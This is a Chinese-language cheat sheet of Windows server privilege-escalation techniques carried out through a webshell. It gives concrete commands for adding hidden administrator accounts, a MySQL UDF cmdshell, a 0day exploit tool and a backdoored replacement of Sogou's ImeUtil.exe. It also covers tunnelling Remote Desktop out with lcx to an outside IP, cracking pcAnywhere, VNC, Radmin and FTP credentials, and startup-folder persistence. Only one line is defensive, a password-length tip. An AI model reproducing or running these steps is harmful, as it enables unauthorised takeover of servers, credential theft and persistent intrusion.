pcAnywhere提权:
1.利用pcAnywhere提权,前提条件是pcAnywhere默认安装到默认路径,以及它的目录安全权限有users权限,如果管理员删除了users和power users用户的目录权限,只剩下administer和system用户目录权限,则无法提权;
2.在webshll的大马中查找到pcanywhere目录里的host目录,里面的cif文件保存了连接pcanywhere的账户和密码,然后下载下来,通过PcAnywhere密码破解工具进行破解密码,然后再自己的电脑上安装pcanywhere,然后通过连接到另一台电脑进行远程桌面连接;
——————————–
利用HASH破解提权:
1.工具:ophcrack-win32-installer-3.3.0(hash破解软件) ,Pwdump7(查看hash的软件),彩虹表(密码字典)
2.思路:渗透,管理员可能几台服务器都实用同个密码,我们获取其他一个以后可以尝试登陆
其他服务器
3.例如添加一个用户并将该用户添加到管理员组:net user backlion 123456 /add
net localgroup administrators backlion /add
4.在dos下用pwdump7运行查看该用户的hash值:backlion:1003:2FB6717FC6897581AAD3B435B51404EE:DA0492D72F8D04983188CCD4CA257E44:::
5.然后通过ophcrack和彩虹表进行破解该用户
6.防范:密码超过14位就不能破解,建议密码设置15位,越复杂越好
————————————————
MYSQL提权(udf.dll):
1.用的文件有su.php木马,Linx Mysql BackDoor.php木马
1.udf.dll的默认路径:C:Winntudf.dll(win2000系统),C:Windowsudf.dll (win2003系统)
2.找到网站目录mysql配置文件,常用的有:config.php,web.php,webconfig.php
配置文件如下:
$dbhost = ‘localhost’; // 数据库服务器 就是127.0.0.1
$dbuser = ‘root’; // 数据库用户名
$dbpw = ‘a’; // 数据库密码
$dbname = ‘dz’; // 数据库名
3.在su.php中,填入host:127.0.0.1 user:root passwor:a db:mysql,然后输入sql命令进行添加用户:select state(“net user backlion 123 /add & net localgroup administrators backlion /add”)
然后通过net user查看是否添加成功
4.在udf.ph 中host:127.0.0.1 user:root passwor:a db:mysql,然后填入DLL导出路径:C:Windowsudf.dll ,在sql命令中输入一下命令:
create function cmdshell returns string soname ‘udf.dll’//添加一个udf.dll组件函数
select cmdshell(‘net user backlion$ 123456 /add’); //添加一个用户
select cmdshell(‘net localgroup administrators backlion$ /add’); //将用户添加到管理员组
select cmdshell(‘c:3389.exe’); //这个是把开3389的文件放到C盘,然后运行
drop function cmdshell; //删除函数
select cmdshell(‘netstat -an’); //这是查看端口查开放情况
———————————————————————-
Churrasco提权:
1.用到的工具有:win2003 0day漏洞工具03.exe和cmd.exe;
2.然后在webshell中上传我们的03.exe和cmd.exe到可以读写的目录中,然后切换到可读写的目录中:然后在webshll路径中填入我们的cmd.exe路径如;c :/recyle/cmd.exe 下面填入:c :/recyle/03.exe “net user backlion 123 /add & net localgroup adminstrators backlion /add”
————————————————————————————–
利用sogou输入法(6.0)提权:
1.sogou输入法是6.0版本,然后我们通过webshll木马管理,查找到sogou安装的路径,然后通过上传
ImeUtil.exe 替换原来的ImeUtil.exe文件,只要一加载这个程序就会在系统中自动添加管理员
用户名:sunwear 密码:sunwear
————————————————————
lcx内网端口转化,解决在内网不能远程桌面登录:
1.webshll目标站点的wscript组件开启,并且有一个可读写的目录,一般上传到c:/recyle目录下
2.上传我们的cmd.exe和lcx.exe上去
3.然后在shll路径中填入:c:/recyle/cmd.exe 下面就输入c:/recyle/lcx.exe slave 202.12.13.2 51 127.0.0.1 3389
4.在本地DOS下输入: d:/lcx.exe listen 51 3333 监听51并转发到3333端口
4.在本地远程桌面里面输入:127.0.0.1:3333
———————————————
6Gftp提权:
1.默认安装目录C:Program FilesGene6 FTP Server
2.密码保存文件的路径是在C:Program FilesGene6 FTP ServerRemoteAdminRemote.ini
其配置文件如下:
[Server]
IP=127.0.0.1,8021
//使用的端口号
GrantAllAccessToLocalHost=0
[Acct=Administrator] //用户名
Enabled=1
Rights=0
Password=21232F297A57A5A743894A0E4A801FC3 //md5密码
3.在webshll中发现了有安装g6ftp软件,默认安装路径
4.在shll中输入:C:
ecyclerlcx.exe -tran 8022 127.0.0.1 8021
6.在本地安装6gftp软件,IP地址输入:目标站点IP地址。端口号为8022,用户名为administrator,密码为破解出来的md5值;
——————————————–
Serv-U6.4提权:
1.serv-u的密钥:9dK4g4iPhvOsoEY9nprEiSsmW7OUqFaGuwHT1CtBn9K6hQVg0bd2okQ9ldel+1IGE9b4xDP0q2W+vE4vgZLA7unm6t3CxTI
2.在serv-u中下面的命令中输入:cmd /c net user backlion$ 123 /add & net localgroup administrators backlion$ /add
3.然后就添加了一个用户名
4.就可以用这个账号远程桌面登录了;
—————————————————-
VNC密码的破解和提权:
1在webshll中读取vnc注册表键值:RealVNC的注册表路径:
HKEY_LOCAL_MACHINESOFTWARERealVNCWinVNC4Password
UltraVNC的注册表路径:
HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Defaultpassword
读取的是十进制数,需要转换成十六进制如下:
十六进制:D7 51 CC 73 31 24 7A 93
十进制: 12 7C EF FA 6E 0B 7A D9
3.破解vnc密码:vncpwdump.exe D751CC7331247A93
4.然后在本地安装一个VNC客户端,进行远程连接
—————————————————————-
Radmin提权:
1.在webshll中检查出有安装Radmin程序;
2.在读取Radmin注册表键值,然后把读取的十进制转换成16进制;
3.直接用radmi-hash工具连接,把读取的十六进制填入进去;
4.最后可以用radmin客户端连接就行了;
————————————————–
360安全卫士提权:
1.上传我们的cmd.exe和360.exe到可读写的目录下如:c:/recyle
2.在shell中输入:c:/recyle/cmd.exe 然后在下面输入:c:/recyle/360.exe sethc
3.然后远程桌面登录输入目标IP地址,过一会就弹出了一个DOS窗口,然后就可以添加用户名和密码
———————————————————————————
启动项提取:
1.在webshll中上传一个添加用户的批处理文件如:net user backlion$ 123456 /add & net localgroup adminsitrators backlion$ /add
爆出为系统修复.bat;
2.然后在wegshll中输入启动选的路径:C:Documents and SettingsAdministrator「开始」菜单程序启动 上传我们的批处理文件;
3.只要管理员下次重新启动机子,就能自动添加我们的账号;